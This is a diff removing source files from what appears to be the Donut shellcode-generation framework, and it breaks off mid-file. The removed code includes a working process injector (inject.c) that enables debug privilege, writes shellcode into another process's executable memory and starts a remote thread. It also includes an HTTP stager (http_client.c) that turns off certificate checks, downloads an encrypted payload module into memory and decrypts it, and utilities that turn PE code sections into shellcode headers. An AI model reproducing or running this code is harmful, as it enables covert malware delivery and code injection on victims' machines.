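-BEGIN_INTERFACE
-
-HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
-IDebuggerThreadControl * This,
-/* [in] */ REFIID riid,
-/* [iid_is][out] */
-__RPC__deref_out void **ppvObject);
-
-ULONG ( STDMETHODCALLTYPE *AddRef )(
-IDebuggerThreadControl * This);
-
-ULONG ( STDMETHODCALLTYPE *Release )(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ThreadIsBlockingForDebugger)(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *ReleaseAllRuntimeThreads)(
-IDebuggerThreadControl * This);
-
-HRESULT ( STDMETHODCALLTYPE *StartBlockingForDebugger)(
-IDebuggerThreadControl * This,
-DWORD dwUnused);
-
-END_INTERFACE
-} IDebuggerThreadControlVtbl;
-
-typedef struct _IDebuggerThreadControl {
-IDebuggerThreadControlVtbl *lpVtbl;
-} IDebuggerThreadControl;
-
-#endif
-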
+0
-4
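--- a/payload/exe2h/Makefile
+++ /dev/null
@@ -1,4 +0,0 @@
-exe2h:
-gcc -I ../../include -Wall exe2h.c -oexe2h
-clean:
-rm *.o exe2h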
+0
-4
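--- a/payload/exe2h/Makefile.mingw
+++ /dev/null
@@ -1,4 +0,0 @@
-exe2h:
-x86_64-w64-mingw32-gcc exe2h.c mmap-windows.c -lshlwapi -oexe2h.exe
-clean:
-rm exe2h.exe *.o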
+0
-4
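--- a/payload/exe2h/Makefile.msvc
+++ /dev/null
@@ -1,4 +0,0 @@
-exe2h:
-cl exe2h.c mmap-windows.c
-clean:
-del exe2h.obj mmap-windows.obj exe2h.exe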
+0
-319
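--- a/payload/exe2h/exe2h.c
+++ /dev/null
@@ -1,319 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <stdint.h>
-#include <ctype.h>
-
-#include <fcntl.h>
-#include <errno.h>
-#include <sys/types.h>
-#include <sys/stat.h>
-
-#if defined(_WIN32) || defined(_WIN64)
-#define WINDOWS
-#include <windows.h>
-#include <shlwapi.h>
-#include "mmap.h"
-#pragma comment(lib, "shlwapi.lib")
-#else
-#define NIX
-#include <libgen.h>
-#include <sys/mman.h>
-#include <unistd.h>
-#include <pe.h>
-#endif
-
-// return pointer to DOS header
-PIMAGE_DOS_HEADER DosHdr(void *map) {
-return (PIMAGE_DOS_HEADER)map;
-}
-
-// return pointer to NT header
-PIMAGE_NT_HEADERS NtHdr (void *map) {
-return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
-}
-
-// return pointer to File header
-PIMAGE_FILE_HEADER FileHdr (void *map) {
-return &NtHdr(map)->FileHeader;
-}
-
-// determines CPU architecture of binary
-int is32 (void *map) {
-return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
-}
-
-// determines CPU architecture of binary
-int is64 (void *map) {
-return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
-}
-
-// return pointer to Optional header
-void* OptHdr (void *map) {
-return (void*)&NtHdr(map)->OptionalHeader;
-}
-
-// return pointer to first section header
-PIMAGE_SECTION_HEADER SecHdr (void *map) {
-PIMAGE_NT_HEADERS nt = NtHdr(map);
-
-return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
-nt->FileHeader.SizeOfOptionalHeader);
-}
-
-uint32_t DirSize (void *map) {
-if (is32(map)) {
-return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
-} else {
-return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
-}
-}
-
-uint32_t SecSize (void *map) {
-return NtHdr(map)->FileHeader.NumberOfSections;
-}
-
-PIMAGE_DATA_DIRECTORY Dirs (void *map) {
-if (is32(map)) {
-return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
-} else {
-return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
-}
-}
-
-uint64_t ImgBase (void *map) {
-if (is32(map)) {
-return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
-} else {
-return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
-}
-}
-
-// valid dos header?
-int valid_dos_hdr (void *map) {
-PIMAGE_DOS_HEADER dos = DosHdr(map);
-
-if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
-return (dos->e_lfanew != 0);
-}
-
-// valid nt headers
-int valid_nt_hdr (void *map) {
-return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
-}
-
-uint32_t rva2ofs (void *map, uint32_t rva) {
-int i;
-
-PIMAGE_SECTION_HEADER sh = SecHdr(map);
-
-for (i=0; i<SecSize(map); i++) {
-if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
-return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
-}
-return -1;
-}
-
-void bin2h(void *map, char *fname, void *bin, uint32_t len) {
-char label[32], file[32], *str;
-uint32_t i;
-uint8_t *p=(uint8_t*)bin;
-FILE *fd;
-
-memset(label, 0, sizeof(label));
-memset(file, 0, sizeof(file));
-
-#if defined(WINDOWS)
-str = PathFindFileName(fname);
-#else
-str = basename(fname);
-#endif
-for(i=0; str[i] != 0 && i < 16;i++) {
-if(str[i] == '.') {
-file[i] = label[i] = '_';
-} else {
-label[i] = toupper(str[i]);
-file[i] = tolower(str[i]);
-}
-}
-if(map != NULL) {
-strcat(label, is32(map) ? "_X86" : "_X64");
-strcat(file, is32(map) ? "_x86" : "_x64");
-}
-strcat(file, ".h");
-
-fd = fopen(file, "wb");
-
-if(fd != NULL) {
-fprintf(fd, "\nunsigned char %s[] = {", label);
-
-for(i=0;i<len;i++) {
-if(!(i % 12)) fprintf(fd, "\n ");
-fprintf(fd, "0x%02x", p[i]);
-if((i+1) != len) fprintf(fd, ", ");
-}
-fprintf(fd, "};\n\n");
-fclose(fd);
-printf(" [ saved code to %s\n", file);
-} else printf(" [ unable to create file : %s\n", file);
-}
-
-/**
-void bin2array(void *map, char *fname, void *bin, uint32_t len) {
-char label[32], file[32], *str;
-uint32_t i;
-uint32_t *p=(uint32_t*)bin;
-FILE *fd;
-
-memset(label, 0, sizeof(label));
-memset(file, 0, sizeof(file));
-
-#if defined(WINDOWS)
-str = PathFindFileName(fname);
-#else
-str = basename(fname);
-#endif
-for(i=0; str[i] != 0 && i < 16;i++) {
-if(str[i] == '.') {
-file[i] = label[i] = '_';
-} else {
-label[i] = toupper(str[i]);
-file[i] = tolower(str[i]);
-}
-}
-
-strcat(file, ".h");
-
-fd = fopen(file, "wb");
-
-if(fd != NULL) {
-// align up by 4
-len = (len & -4) + 4;
-len >>= 2;
-
-// declare the array
-fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
-
-// initialize array
-for(i=0; i<len; i++) {
-fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
-}
-fclose(fd);
-printf(" [ Saved array to %s\n", file);
-} else printf(" [ unable to create file : %s\n", file);
-}
-*/
-// structure of COFF (.obj) file
-
-//--------------------------//
-// IMAGE_FILE_HEADER //
-//--------------------------//
-// IMAGE_SECTION_HEADER //
-// * num sections //
-//--------------------------//
-// //
-// //
-// //
-// section data //
-// * num sections //
-// //
-// //
-//--------------------------//
-// IMAGE_SYMBOL //
-// * num symbols //
-//--------------------------//
-// string table //
-//--------------------------//
-
-int main (int argc, char *argv[]) {
-int fd, i;
-struct stat fs;
-uint8_t *map, *cs;
-PIMAGE_SECTION_HEADER sh;
-//PIMAGE_FILE_HEADER fh;
-//PIMAGE_COFF_SYMBOLS_HEADER csh;
-uint32_t ofs, len;
-
-if (argc != 2) {
-printf ("\n [ usage: file2h <file.exe | file.bin>\n");
-return 0;
-}
-
-// open file for reading
-fd = open(argv[1], O_RDONLY);
-
-if(fd == 0) {
-printf(" [ unable to open %s\n", argv[1]);
-return 0;
-}
-// if file has some data
-if(fstat(fd, &fs) == 0) {
-// map into memory
-map = (uint8_t*)mmap(NULL, fs.st_size,
-PROT_READ, MAP_PRIVATE, fd, 0);
-if(map != NULL) {
-if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
-printf(" [ Found valid DOS and NT header.\n");
-// get the .text section
-sh = SecHdr(map);
-// if a section header was returned
-if(sh != NULL) {
-printf(" [ Locating .text section.\n");
-// locate the .text section
-for(i=0; i<SecSize(map); i++) {
-if(strcmp((char*)sh[i].Name, ".text") == 0) {
-ofs = rva2ofs(map, sh[i].VirtualAddress);
-
-if(ofs != -1) {
-cs = (map + ofs);
-len = sh[i].Misc.VirtualSize;
-// convert to header file
-bin2h(map, argv[1], cs, len);
-break;
-}
-}
-}
-}
-} else {
-printf(" [ No valid DOS or NT header found.\n");
-// treat file as binary
-bin2h(NULL, argv[1], map, fs.st_size);
-//bin2array(NULL, argv[1], map, fs.st_size);
-}
-munmap(map, fs.st_size);
-}
-}
-close(fd);
-return 0;
-}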
payload/exe2h/exe2h.obj less more
Binary diff not shown
+0
-74
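--- a/payload/exe2h/mmap-windows.c
+++ /dev/null
@@ -1,74 +0,0 @@
-/* mmap() replacement for Windows
-*
-* Author: Mike Frysinger <[email protected]>
-* Placed into the public domain
-*/
-
-/* References:
-* CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
-* CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
-* MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
-* UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
-*/
-
-#include "mmap.h"
-
-void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
-{
-if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
-return MAP_FAILED;
-if (fd == -1) {
-if (!(flags & MAP_ANON) || offset)
-return MAP_FAILED;
-} else if (flags & MAP_ANON)
-return MAP_FAILED;
-
-DWORD flProtect;
-if (prot & PROT_WRITE) {
-if (prot & PROT_EXEC)
-flProtect = PAGE_EXECUTE_READWRITE;
-else
-flProtect = PAGE_READWRITE;
-} else if (prot & PROT_EXEC) {
-if (prot & PROT_READ)
-flProtect = PAGE_EXECUTE_READ;
-else if (prot & PROT_EXEC)
-flProtect = PAGE_EXECUTE;
-} else
-flProtect = PAGE_READONLY;
-
-off_t end = length + offset;
-HANDLE mmap_fd, h;
-if (fd == -1)
-mmap_fd = INVALID_HANDLE_VALUE;
-else
-mmap_fd = (HANDLE)_get_osfhandle(fd);
-h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
-if (h == NULL)
-return MAP_FAILED;
-
-DWORD dwDesiredAccess;
-if (prot & PROT_WRITE)
-dwDesiredAccess = FILE_MAP_WRITE;
-else
-dwDesiredAccess = FILE_MAP_READ;
-if (prot & PROT_EXEC)
-dwDesiredAccess |= FILE_MAP_EXECUTE;
-if (flags & MAP_PRIVATE)
-dwDesiredAccess |= FILE_MAP_COPY;
-void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
-if (ret == NULL) {
-CloseHandle(h);
-ret = MAP_FAILED;
-}
-return ret;
-}
-
-void munmap(void *addr, size_t length)
-{
-UnmapViewOfFile(addr);
-/* ruh-ro, we leaked handle from CreateFileMapping() ... */
-}
-
-#undef DWORD_HI
-#undef DWORD_LO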
payload/exe2h/mmap-windows.obj less more
Binary diff not shown
+0
-45
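--- a/payload/exe2h/mmap.h
+++ /dev/null
@@ -1,45 +0,0 @@
-
-
-#ifndef MMAP_H
-#define MMAP_H
-
-#include <io.h>
-#include <windows.h>
-#include <sys/types.h>
-
-#define PROT_READ 0x1
-#define PROT_WRITE 0x2
-/* This flag is only available in WinXP+ */
-#ifdef FILE_MAP_EXECUTE
-#define PROT_EXEC 0x4
-#else
-#define PROT_EXEC 0x0
-#define FILE_MAP_EXECUTE 0
-#endif
-
-#define MAP_SHARED 0x01
-#define MAP_PRIVATE 0x02
-#define MAP_ANONYMOUS 0x20
-#define MAP_ANON MAP_ANONYMOUS
-#define MAP_FAILED ((void *) -1)
-
-#ifdef __USE_FILE_OFFSET64
-# define DWORD_HI(x) (x >> 32)
-# define DWORD_LO(x) ((x) & 0xffffffff)
-#else
-# define DWORD_HI(x) (0)
-# define DWORD_LO(x) (x)
-#endif
-
-#ifdef __cplusplus
-extern "C" {
-#endif
-
-void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
-void munmap(void *addr, size_t length);
-
-#ifdef __cplusplus
-}
-#endif
-
-#endif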
+0
-61
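--- a/payload/getpc.c
+++ /dev/null
@@ -1,61 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-// Function to return the program counter.
-// Always place this at the end of payload.
-// Tested with x86 build of MSVC 2019 and MinGW. YMMV.
-#if defined(_MSC_VER)
-#if defined(_M_IX86)
-__declspec(naked) char *get_pc(void) {
-__asm {
-call pc_addr
-pc_addr:
-pop eax
-sub eax, 5
-ret
-}
-}
-#endif
-#elif defined(__GNUC__)
-#if defined(__i386__)
-asm (
-".global get_pc\n"
-".global _get_pc\n"
-"_get_pc:\n"
-"get_pc:\n"
-" call pc_addr\n"
-"pc_addr:\n"
-" pop %eax\n"
-" sub $5, %eax\n"
-" ret\n"
-);
-#endif
-#endif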
+0
-198
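--- a/payload/http_client.c
+++ /dev/null
@@ -1,198 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-BOOL DownloadModule(PDONUT_INSTANCE inst) {
-HINTERNET hin, con, req;
-PBYTE buf;
-DWORD s, n, rd, len, code=0;
-BOOL bResult = FALSE, bSecure = FALSE;
-URL_COMPONENTS uc;
-CHAR host[DONUT_MAX_URL],
-file[DONUT_MAX_URL];
-
-// default flags for HTTP client
-DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
-INTERNET_FLAG_NO_CACHE_WRITE |
-INTERNET_FLAG_NO_UI |
-INTERNET_FLAG_RELOAD |
-INTERNET_FLAG_NO_AUTO_REDIRECT;
-
-Memset(&uc, 0, sizeof(uc));
-
-uc.dwStructSize = sizeof(uc);
-uc.lpszHostName = host;
-uc.lpszUrlPath = file;
-uc.dwHostNameLength = DONUT_MAX_URL;
-uc.dwUrlPathLength = DONUT_MAX_URL;
-
-DPRINT("Decoding URL %s", inst->http.url);
-
-if(!inst->api.InternetCrackUrl(
-inst->http.url, 0, ICU_DECODE, &uc)) {
-return FALSE;
-}
-
-bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
-
-// if secure connection, update the flags to ignore
-// invalid certificates
-if(bSecure) {
-flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
-INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
-INTERNET_FLAG_SECURE;
-}
-
-DPRINT("Initializing WININET");
-
-hin = inst->api.InternetOpen(
-NULL, INTERNET_OPEN_TYPE_PRECONFIG,
-NULL, NULL, 0);
-
-if(hin == NULL) return FALSE;
-
-DPRINT("Creating %s connection for %s",
-bSecure ? "HTTPS" : "HTTP", host);
-
-con = inst->api.InternetConnect(
-hin, host,
-bSecure ? INTERNET_DEFAULT_HTTPS_PORT : INTERNET_DEFAULT_HTTP_PORT,
-NULL, NULL,
-INTERNET_SERVICE_HTTP, 0, 0);
-
-if(con != NULL) {
-DPRINT("Creating HTTP %s request for %s",
-inst->http.req, file);
-
-req = inst->api.HttpOpenRequest(
-con, inst->http.req,
-file, NULL, NULL, NULL, flags, 0);
-
-if(req != NULL) {
-
-// see if we should ignore invalid certificates for this request
-if(bSecure) {
-if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
-n = sizeof (s);
-
-s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
-SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
-SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
-SECURITY_FLAG_IGNORE_WRONG_USAGE |
-SECURITY_FLAG_IGNORE_REVOCATION;
-
-DPRINT("Setting option to ignore invalid certificates");
-
-inst->api.InternetSetOption(
-req,
-INTERNET_OPTION_SECURITY_FLAGS,
-&s,
-sizeof(s));
-}
-}
-DPRINT("Sending request");
-
-if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
-len = sizeof(DWORD);
-code = 0;
-DPRINT("Querying status code");
-
-if(inst->api.HttpQueryInfo(
-req,
-HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
-&code, &len, 0))
-{
-DPRINT("Code is %ld", code);
-
-if(code == HTTP_STATUS_OK) {
-DPRINT("Querying content length");
-
-len = sizeof(SIZE_T);
-inst->mod_len = 0;
-
-if(inst->api.HttpQueryInfo(
-req,
-HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
-&inst->mod_len, &len, 0))
-{
-if(inst->mod_len != 0) {
-DPRINT("Allocating memory for module");
-
-inst->module.p = inst->api.VirtualAlloc(
-NULL, inst->mod_len,
-MEM_COMMIT | MEM_RESERVE,
-PAGE_READWRITE);
-
-if(inst->module.p != NULL) {
-rd = 0;
-DPRINT("Downloading module into memory");
-bResult = inst->api.InternetReadFile(
-req,
-inst->module.p,
-inst->mod_len, &rd);
-}
-}
-}
-}
-}
-}
-DPRINT("Closing request handle");
-inst->api.InternetCloseHandle(req);
-}
-DPRINT("Closing HTTP connection");
-inst->api.InternetCloseHandle(con);
-}
-DPRINT("Closing internet handle");
-inst->api.InternetCloseHandle(hin);
-
-#if !defined(NOCRYPTO)
-if(bResult) {
-PDONUT_MODULE mod = inst->module.p;
-
-DPRINT("Decrypting %lli bytes of module", inst->mod_len);
-
-donut_decrypt(inst->mod_key.mk,
-inst->mod_key.ctr,
-mod,
-inst->mod_len);
-
-DPRINT("Generating hash to verify decryption");
-ULONG64 mac = maru(inst->sig, inst->iv);
-
-DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
-
-if(mac != mod->mac) {
-DPRINT("Decryption failed");
-return FALSE;
-}
-}
-#endif
-return bResult;
-}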
+0
-235
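--- a/payload/inject.c
+++ /dev/null
@@ -1,235 +0,0 @@
-/**
-BSD 3-Clause License
-
-Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
-
-Redistribution and use in source and binary forms, with or without
-modification, are permitted provided that the following conditions are met:
-
-* Redistributions of source code must retain the above copyright notice, this
-list of conditions and the following disclaimer.
-
-* Redistributions in binary form must reproduce the above copyright notice,
-this list of conditions and the following disclaimer in the documentation
-and/or other materials provided with the distribution.
-
-* Neither the name of the copyright holder nor the names of its
-contributors may be used to endorse or promote products derived from
-this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
-AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
-IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
-DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
-FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
-DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
-CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
-OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-*/
-
-#include <Windows.h>
-#include <stdio.h>
-#include <tlhelp32.h>
-
-#pragma comment(lib, "advapi32.lib")
-#pragma comment(lib, "shell32.lib")
-#pragma comment(lib, "user32.lib")
-
-typedef struct _CLIENT_ID {
-PVOID UniqueProcess;
-PVOID UniqueThread;
-} CLIENT_ID, *PCLIENT_ID;
-
-typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
-IN HANDLE ProcessHandle,
-IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
-IN BOOLEAN CreateSuspended,
-IN ULONG StackZeroBits,
-IN OUT PULONG StackReserved,
-IN OUT PULONG StackCommit,
-IN PVOID StartAddress,
-IN PVOID StartParameter OPTIONAL,
-OUT PHANDLE ThreadHandle,
-OUT PCLIENT_ID ClientID);
-
-BOOL EnablePrivilege(PCHAR szPrivilege){
-HANDLE hToken;
-BOOL bResult;
-LUID luid;
-TOKEN_PRIVILEGES tp;
-
-// open token for current process
-bResult = OpenProcessToken(GetCurrentProcess(),
-TOKEN_ADJUST_PRIVILEGES, &hToken);
-
-if(!bResult) return FALSE;
-
-// lookup privilege
-bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
-if(bResult){
-tp.PrivilegeCount = 1;
-tp.Privileges[0].Luid = luid;
-tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
-
-// adjust token
-bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
-}
-CloseHandle(hToken);
-return bResult;
-}
-
-// display error message for last error code
-VOID xstrerror (PCHAR fmt, ...){
-PCHAR error=NULL;
-va_list arglist;
-CHAR buffer[1024];
-DWORD dwError=GetLastError();
-
-va_start(arglist, fmt);
-vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
-va_end (arglist);
-
-if (FormatMessage (
-FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
-NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-(LPSTR)&error, 0, NULL))
-{
-printf(" [ %s : %s\n", buffer, error);
-LocalFree (error);
-} else {
-printf(" [ %s error : %08lX\n", buffer, dwError);
-}
-}
-
-DWORD name2pid(PCHAR procName){
-HANDLE hSnap;
-PROCESSENTRY32 pe32;
-DWORD pid=0;
-
-// create snapshot of system
-hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
-if(hSnap == INVALID_HANDLE_VALUE) return 0;
-
-pe32.dwSize = sizeof(PROCESSENTRY32);
-
-// get first process
-if(Process32First(hSnap, &pe32)){
-do {
-if(!lstrcmpi(pe32.szExeFile, procName)){
-pid=pe32.th32ProcessID;
-break;
-}
-} while(Process32Next(hSnap, &pe32));
-}
-CloseHandle(hSnap);
-return pid;
-}
-
-BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
-SIZE_T wr;
-HANDLE hp,ht;
-LPVOID cs;
-RtlCreateUserThread_t pRtlCreateUserThread;
-HMODULE hn;
-CLIENT_ID cid;
-NTSTATUS nt=~0UL;
-DWORD t;
-
-// 1. resolve API address
-hn = GetModuleHandle("ntdll.dll");
-pRtlCreateUserThread=(RtlCreateUserThread_t)
-GetProcAddress(hn, "RtlCreateUserThread");
-
-printf(" [ opening process %li\n", id);
-// 2. open the target process
-hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
-
-if(hp == NULL) return FALSE;
-
-// 3. allocate executable-read-write (XRW) memory for payload
-printf(" [ allocating memory for payload.\n");
-cs=VirtualAllocEx(hp, NULL, codeLen,
-MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
-
-printf(" [ writing code to %p.\n", cs);
-// 4. copy the payload to remote memory
-WriteProcessMemory(hp, cs, code, codeLen, &wr);
-VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
-
-printf(" [ press any key to continue.\n");
-getchar();
-
-// 5. execute payload in remote process
-printf(" [ creating new thread.\n");
-nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
-NULL, cs, NULL, &ht, &cid);
-
-printf(" [ nt status is %lx\n", nt);
-WaitForSingleObject(ht, INFINITE);
-
-// 6. close remote thread handle
-CloseHandle(ht);
-
-// 7. free remote memory
-printf(" [ freeing memory.\n");
-VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
-
-// 8. close remote process handle
-CloseHandle(hp);
-return nt == 0; // STATUS_SUCCESS
-}
-
-DWORD getdata(PCHAR path, LPVOID *data){
-HANDLE hf;
-DWORD len,rd=0;
-
-// 1. open the file
-hf=CreateFile(path, GENERIC_READ, 0, 0,
-OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
-
-if(hf!=INVALID_HANDLE_VALUE){
-// get file size
-len=GetFileSize(hf, 0);
-// allocate memory
-*data=malloc(len + 16);
-// read file contents into memory
-ReadFile(hf, *data, len, &rd, 0);
-CloseHandle(hf);
-}
-return rd;
-}
-
-int main(int argc, char *argv[]){
-LPVOID code;
-SIZE_T code_len;
-DWORD pid;
-
-if (argc != 3){
-printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
-return 0;
-}
-
-if(!EnablePrivilege(SE_DEBUG_NAME)) {
-printf(" [ cannot enable SeDebugPrivilege.\n");
-}
-
-// get pid
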